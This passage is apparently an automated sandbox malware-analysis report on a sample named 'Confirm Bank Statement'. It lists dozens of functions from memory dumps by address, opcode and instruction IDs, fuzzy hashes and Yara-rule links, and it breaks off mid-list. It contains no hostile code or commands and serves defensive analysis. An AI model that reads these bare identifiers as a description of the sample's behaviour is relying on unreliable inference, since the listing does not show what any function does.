                                                                                              • Instruction Fuzzy Hash: 0251D2B4D65249CFDB10DFA4D6896AEBFF5FF4A301F10902AE819AB240DB741945CF41
                                                                                              Function 07274F70 Relevance: .1, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 53c4688b18709a736d20d6c410690f61e445c3afe5e253201a7fb91d41d78b20
                                                                                              • Instruction ID: 03a6b251a928a430b3e7e9e2193adf7842fa9c40f0c8ef200f75ceb73f35232a
                                                                                              • Opcode Fuzzy Hash: 53c4688b18709a736d20d6c410690f61e445c3afe5e253201a7fb91d41d78b20
                                                                                              • Instruction Fuzzy Hash: 5F51CFB4D65249CFDB10DFA5D6896AEBFF5FF4A301F10902AE81AAB240DB701945CF81
                                                                                              Function 07279E50 Relevance: .1, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b559ae0aa0062d65bbf67bd6b383b4b17f276dc51a2be7724a65cd3aead4978d
                                                                                              • Instruction ID: 184f443aacee04ab1ff123cbf8cd40f4ccb745efacd17efb87582ad9ecbc3363
                                                                                              • Opcode Fuzzy Hash: b559ae0aa0062d65bbf67bd6b383b4b17f276dc51a2be7724a65cd3aead4978d
                                                                                              • Instruction Fuzzy Hash: 124128B0D293098FDB08CFAAC6416FEBBF6BB8E300F14D06AD859A7251D7745980CB55
                                                                                              Function 055B1C28 Relevance: .1, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 274f33256d73d37be07f7219e7556616dad1fbd688ef94d4e54b695b8a4683ec
                                                                                              • Instruction ID: 0c1cf4cae40c6805467e6734f8fa1c126ca0855a77c18d82c8b0dc525482efa3
                                                                                              • Opcode Fuzzy Hash: 274f33256d73d37be07f7219e7556616dad1fbd688ef94d4e54b695b8a4683ec
                                                                                              • Instruction Fuzzy Hash: EC411A34B145588FEB54DB6AD898EEDBBF6BF89604F1440A9E501EB3A1DBB1D800CB50
                                                                                              Function 055B4658 Relevance: .1, Instructions: 124COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 96bb0bd172546afe3ebf1479ae2e3a34169d7260c5cd57f62ab5febb8eb465d0
                                                                                              • Instruction ID: c8cd1ab04d86ac4739f969b612d5fcddab70e79ced195de0c7aa93327d0e2bbe
                                                                                              • Opcode Fuzzy Hash: 96bb0bd172546afe3ebf1479ae2e3a34169d7260c5cd57f62ab5febb8eb465d0
                                                                                              • Instruction Fuzzy Hash: A0416E35A0022ACFEF25DFA8D848AED7BFAFB49314F144029D405BB211EB749905CB90
                                                                                              Function 055B0430 Relevance: .1, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 535ff9c2e1ccb5354dd16e547891fd2ba3f5efb5da50932de2a7708a3e957ea8
                                                                                              • Instruction ID: c7543c448ef8a2f07069464c4bfbd3b6b00d39a02ece0b0c9614d36fcc81d369
                                                                                              • Opcode Fuzzy Hash: 535ff9c2e1ccb5354dd16e547891fd2ba3f5efb5da50932de2a7708a3e957ea8
                                                                                              • Instruction Fuzzy Hash: 12511974A01209EFDB10DF94E598BEEBBB2FF88310F108058E905A77A1CB71AD10CB60
                                                                                              Function 07272318 Relevance: .1, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: febe2f9fb6d2f8f32f28fa6238153359438952ad16860e4959d3f4bf64f3f0f3
                                                                                              • Instruction ID: aa666102e5bf17d06c586a2778400b3a225aeeeb7cf3d0ba19d192817ebb5fd9
                                                                                              • Opcode Fuzzy Hash: febe2f9fb6d2f8f32f28fa6238153359438952ad16860e4959d3f4bf64f3f0f3
                                                                                              • Instruction Fuzzy Hash: CF416CB0A1124ADFDB14DFA8D954A9DBBF2FF89310F148169E441FB3A1DB71A841CB90
                                                                                              Function 07272328 Relevance: .1, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 594796dd4dc1c9d5100fdde610d258b277d4331b14d490ed2e7c056825d90fa6
                                                                                              • Instruction ID: 6d1487cb97cf1df4fdcec836035f17268d2a2fd3575d4e207f4307966d0b67d2
                                                                                              • Opcode Fuzzy Hash: 594796dd4dc1c9d5100fdde610d258b277d4331b14d490ed2e7c056825d90fa6
                                                                                              • Instruction Fuzzy Hash: D3414CB0A21209DFDB14EFA8D954A9DBBF6BF89310F148169E441FB3A0DB71AD41CB50
                                                                                              Function 072707B2 Relevance: .1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c402885b67a496b2351d44269f74f9d6bc093884813563d11ec0153ff351eea
                                                                                              • Instruction ID: 1835f54b04763610a2ef4f10f6efb5ebb4e418be437b159e536a4cc1d3399a43
                                                                                              • Opcode Fuzzy Hash: 7c402885b67a496b2351d44269f74f9d6bc093884813563d11ec0153ff351eea
                                                                                              • Instruction Fuzzy Hash: A84151B1F11205CFDB24DF69C698AADBBF2EF88311F188069E405AB360DB719D45CB50
                                                                                              Function 055B3280 Relevance: .1, Instructions: 112COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d76ec7e8cc8b048543809496a5e703a836c37ee94c557b15d6258932da411164
                                                                                              • Instruction ID: 6ea0b4c8faba66133f859096abf748c9dbd19221139dcb5acb97ca16b7f0f434
                                                                                              • Opcode Fuzzy Hash: d76ec7e8cc8b048543809496a5e703a836c37ee94c557b15d6258932da411164
                                                                                              • Instruction Fuzzy Hash: 3E413C30B00219DFDF19DBADD4886EEB7F2BF88204F154A29E106EB741DBB49941CB91
                                                                                              Function 07275003 Relevance: .1, Instructions: 111COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 697a1e4b4a30518231d2742be7fc543edbca1e3c8499c8513340be91d1c5bc56
                                                                                              • Instruction ID: 740709579c3531505f4a89575aca47755a77a6af9b3188d1591c8c04db115a5f
                                                                                              • Opcode Fuzzy Hash: 697a1e4b4a30518231d2742be7fc543edbca1e3c8499c8513340be91d1c5bc56
                                                                                              • Instruction Fuzzy Hash: AE416DB4D65249CFCB10DFA4D5896AEBFF5FF0A311F10902AE916AB240DB742945CF41
                                                                                              Function 055B0F08 Relevance: .1, Instructions: 105COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 180c6465abc99d2aefcea01a41a89e6cad046d281cb2b28997fd7bdf01855889
                                                                                              • Instruction ID: f8ecce67e71bf59515341552d76ce21589d2eb913231881c66ab2376386c8d05
                                                                                              • Opcode Fuzzy Hash: 180c6465abc99d2aefcea01a41a89e6cad046d281cb2b28997fd7bdf01855889
                                                                                              • Instruction Fuzzy Hash: 15414F34A1070ACFDB04EF78C8949DDBBB6FF89304F108559E115AB325EB71A945CB81
                                                                                              Function 055BCBDA Relevance: .1, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 213c5feded0377ed0075cf4072d3c839a27976826e1a020c9475e147d230b7bf
                                                                                              • Instruction ID: f173ed381c127a5c32d93efff621d361c698914332494ae4feddbccc0588a667
                                                                                              • Opcode Fuzzy Hash: 213c5feded0377ed0075cf4072d3c839a27976826e1a020c9475e147d230b7bf
                                                                                              • Instruction Fuzzy Hash: FC412C34A1070ACFCB04EF68C8849DDBBB6FF89304F108559E519AB365EB71A946CB81
                                                                                              Function 07276FE8 Relevance: .1, Instructions: 100COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c1b9e849f8364a85196d1137417aa049091356ad740d6712d967807aee4be149
                                                                                              • Instruction ID: 9b52136cf31e671ef9db6b1c04f5637f05d1f6bd2d6363c77956b5eb1a65f595
                                                                                              • Opcode Fuzzy Hash: c1b9e849f8364a85196d1137417aa049091356ad740d6712d967807aee4be149
                                                                                              • Instruction Fuzzy Hash: 044144B0D25219CFDB04CFA9CA406EEBBB6FF89312F109429E405AB350DBB55940CFA0
                                                                                              Function 055B882C Relevance: .1, Instructions: 100COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: be0eddada9caf4a2c11340319f2ad728d6caca6e44b3f863ce54b915e4d5307f
                                                                                              • Instruction ID: 543f664f9761d3c5fcd685accecf563fd9153da8c7d2575652c1f8dd0da51b9b
                                                                                              • Opcode Fuzzy Hash: be0eddada9caf4a2c11340319f2ad728d6caca6e44b3f863ce54b915e4d5307f
                                                                                              • Instruction Fuzzy Hash: 5841F3B1D00309CBEB20DFA9C988ADDFBF5BF49304F648529D408AB200D7756A4ACF91
                                                                                              Function 07270990 Relevance: .1, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4a00b65e750da5ed20c3c0d1f4b89d83851120a287b6340569fe684b8bc5e22a
                                                                                              • Instruction ID: 0818c9451fd0d0fc2b70c43ecf199dda0f0a2042fadb6438ed4772c2617b79a2
                                                                                              • Opcode Fuzzy Hash: 4a00b65e750da5ed20c3c0d1f4b89d83851120a287b6340569fe684b8bc5e22a
                                                                                              • Instruction Fuzzy Hash: F33131F0F20117CFCB213B64CA4867EBFB4EB80248F6544A9D18277294D631CD29CB92
                                                                                              Function 055B7F9C Relevance: .1, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 163e042af90a76f761594782087ae333ddc80fcdec7be1cc75e640ca05b736c9
                                                                                              • Instruction ID: 0da9457902fe3c440bb618fe22dbc3e586c5e1118e83bdfa965a2de358d54059
                                                                                              • Opcode Fuzzy Hash: 163e042af90a76f761594782087ae333ddc80fcdec7be1cc75e640ca05b736c9
                                                                                              • Instruction Fuzzy Hash: DD41C2B1D0030DCBEB20DFA9C588ADDFBB5BF49304F648529D409AB200D7B56A4ACF91
                                                                                              Function 055BA857 Relevance: .1, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b5552f5a002eea8bee76aac63157df887bc436cae2c8bba56d16eb00045708b3
                                                                                              • Instruction ID: d875f188ff6a404ffdfb538356a334bd87bac3a8609ac09b6737a2176766f266
                                                                                              • Opcode Fuzzy Hash: b5552f5a002eea8bee76aac63157df887bc436cae2c8bba56d16eb00045708b3
                                                                                              • Instruction Fuzzy Hash: 2341E875A0020ADFCB44DF69D88499EFBB5FF89310B15C669E918AB311E730E985CF90
                                                                                              Function 055BDAA8 Relevance: .1, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8baea8769afe8f3f8a591220b5f89618373bf5b68705b7035e107ebab21f3015
                                                                                              • Instruction ID: f1cefa49602a502bdcd2c8613743e19f1675babc9e3276fa5fa3241b107c5479
                                                                                              • Opcode Fuzzy Hash: 8baea8769afe8f3f8a591220b5f89618373bf5b68705b7035e107ebab21f3015
                                                                                              • Instruction Fuzzy Hash: F1410A75A042068FD714CF68C584AA9FBF1FF49310B1986A9D84ADB361D774EC45CF90
                                                                                              Function 07276FD8 Relevance: .1, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f17e506edaa0844aa027a724e4d90287f26467776a6ed274cbaf2e1146066b2c
                                                                                              • Instruction ID: 115872fb87e80f33180447457d26d1e69a68ffc49760a992b04364a31b367a9c
                                                                                              • Opcode Fuzzy Hash: f17e506edaa0844aa027a724e4d90287f26467776a6ed274cbaf2e1146066b2c
                                                                                              • Instruction Fuzzy Hash: 724153B0D2521ACFDB04CFA9CA446EEBBB2FF4A312F04846AD411AB361D7B54944CF91
                                                                                              Function 055B77B0 Relevance: .1, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c48c4c6f4ac0501f8a4647058236e03656432c8039ef702b5eda70ac4ef353be
                                                                                              • Instruction ID: 6867ac135bff43274d83cda39a8d0beb119c7c8ee3a19a3d52cb5e0108e3a548
                                                                                              • Opcode Fuzzy Hash: c48c4c6f4ac0501f8a4647058236e03656432c8039ef702b5eda70ac4ef353be
                                                                                              • Instruction Fuzzy Hash: FB41ACB4D003589BDB14CF9AD888ADEBBB5BF49310F20822AE419AB254DBB55845CF94
                                                                                              Function 055B24B4 Relevance: .1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8a0a8a23bf744cce26cc75def9e6fd01dd938e025ec0c7d2065189786da544fa
                                                                                              • Instruction ID: 3b984af538f5edf8f77b181d6991acd1c60d10ed5e834e271c20dc8b8af44754
                                                                                              • Opcode Fuzzy Hash: 8a0a8a23bf744cce26cc75def9e6fd01dd938e025ec0c7d2065189786da544fa
                                                                                              • Instruction Fuzzy Hash: 6B31DF35E01305CBEB04EF69D898691BBB6FF88214F098979E9096F241EF74A484CB61
                                                                                              Function 055B83A7 Relevance: .1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dfa4c45755e5025ce4dcafe1f9d5d8ff37c78ca73d13884d7214f615dafc0684
                                                                                              • Instruction ID: e00ab17b5655058a0c11bd1c27befee5039b207a410e50feee7be07d29bcc5c6
                                                                                              • Opcode Fuzzy Hash: dfa4c45755e5025ce4dcafe1f9d5d8ff37c78ca73d13884d7214f615dafc0684
                                                                                              • Instruction Fuzzy Hash: 1431EAB5E002168BDF05DF79C894AEEBBB6FF99340F14056AD405E7251EA748902C7A2
                                                                                              Function 055BA868 Relevance: .1, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bcce12cc992666fe4118cee999739ba1790f27db2701552a6e44bdb7bb8f0ad9
                                                                                              • Instruction ID: fc5c5ee88d3e0ad3c7c8341ffd1d5b9600414dc1b972c649e8df534e82c55bf4
                                                                                              • Opcode Fuzzy Hash: bcce12cc992666fe4118cee999739ba1790f27db2701552a6e44bdb7bb8f0ad9
                                                                                              • Instruction Fuzzy Hash: 7341E775A0020ADFCB44DF69D88499EFBB5FF89310B15C669E918AB311E730E985CF90
                                                                                              Function 055BCAD8 Relevance: .1, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3f51e63dda8812ca667d170207adc82ee14ac1fc98fecef96a5aadb92fa03e49
                                                                                              • Instruction ID: 3b15d1630e5a44aae8b58d3b1adab9ae6d13285777dea3bb314e9ca3c70b1b90
                                                                                              • Opcode Fuzzy Hash: 3f51e63dda8812ca667d170207adc82ee14ac1fc98fecef96a5aadb92fa03e49
                                                                                              • Instruction Fuzzy Hash: D4314135B112199FDF04EF64D8588DDF7B6FFC9210B048569E506AB360EB71AD46CB80
                                                                                              Function 055B37A0 Relevance: .1, Instructions: 90COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 78ec14519b31bcc2ac27b584e28d691fb34eb5ae38f04be22345ad30d26731ed
                                                                                              • Instruction ID: 4a3f1a1ab97ca1b21df92517f2e1f7453f12583beb40c150bf86d16aac785355
                                                                                              • Opcode Fuzzy Hash: 78ec14519b31bcc2ac27b584e28d691fb34eb5ae38f04be22345ad30d26731ed
                                                                                              • Instruction Fuzzy Hash: 4531DF35E01305CBEB04EF28D848791BBB6FF88214F098979E8096B242EF75A484CB61
                                                                                              Function 072704B8 Relevance: .1, Instructions: 89COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e72894ea89a3fc0eea4707d85a5a3f999270a478b86e1f4e7bab3bf920b9f8d0
                                                                                              • Instruction ID: 04ba121f098eed15d129b81735edee54fb1da2b2a3aca21858d23cc854d3b58c
                                                                                              • Opcode Fuzzy Hash: e72894ea89a3fc0eea4707d85a5a3f999270a478b86e1f4e7bab3bf920b9f8d0
                                                                                              • Instruction Fuzzy Hash: 623181B1A112069FDB24DF64D958BAEBBF6EF88200F14882DE805EB290DB74DD44CB51
                                                                                              Function 055BA0B4 Relevance: .1, Instructions: 89COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2afdee35a455c170244783b161a3e9433486d0755643a5c67e442e8da408151a
                                                                                              • Instruction ID: f7a2d4fe5b58964b4fce6be1f6d348740262eea8c96cbe32afe5e16c4263ac99
                                                                                              • Opcode Fuzzy Hash: 2afdee35a455c170244783b161a3e9433486d0755643a5c67e442e8da408151a
                                                                                              • Instruction Fuzzy Hash: 4921BA323142014FE7149F2CD88D6A93BE5FF89321B1985B5E54ADF3A2DEB5DC058790
                                                                                              Function 055B326F Relevance: .1, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 96bd0533c4dcb05c27d2b8b447c0fe9be1e1a8fba175f4531fc94e4da64a673e
                                                                                              • Instruction ID: c4af2d5dcdd4bf2ead777cc683feee845c9c7a3012eb4ebc9d7b614d971fde89
                                                                                              • Opcode Fuzzy Hash: 96bd0533c4dcb05c27d2b8b447c0fe9be1e1a8fba175f4531fc94e4da64a673e
                                                                                              • Instruction Fuzzy Hash: 8B318D31B00605DFDF18DA6DD4886EEB7F2BF89200F114A29D506E7750EFB4A941CB91
                                                                                              Function 055B1CAE Relevance: .1, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 406079da7950485cf0ef9570e49975742f3e6e7298e44b923b4b359fbe678145
                                                                                              • Instruction ID: b8924d0e17be349dadd06d34cfec94d65b0644d39615bab11a3d3d271869ee9a
                                                                                              • Opcode Fuzzy Hash: 406079da7950485cf0ef9570e49975742f3e6e7298e44b923b4b359fbe678145
                                                                                              • Instruction Fuzzy Hash: 89310534B149158FEB54DB69D8A8AED7BF6BF89604F5400A9E501DB3A1CBB1DC00CB50
                                                                                              Function 055B89B1 Relevance: .1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 619b214b14bf3185869903b2c21830faf5a0f4150c62dad0534e01836065710d
                                                                                              • Instruction ID: 7afe1d2b72d0ebe169bd46bd6261ff28f700abf986765b531946211646316caa
                                                                                              • Opcode Fuzzy Hash: 619b214b14bf3185869903b2c21830faf5a0f4150c62dad0534e01836065710d
                                                                                              • Instruction Fuzzy Hash: 1D213271B001165BDB10DB69CC48AFFBBFEFFC8210F14811AE515E3250EA749A0187A0
                                                                                              Function 07278BD0 Relevance: .1, Instructions: 80COMMON
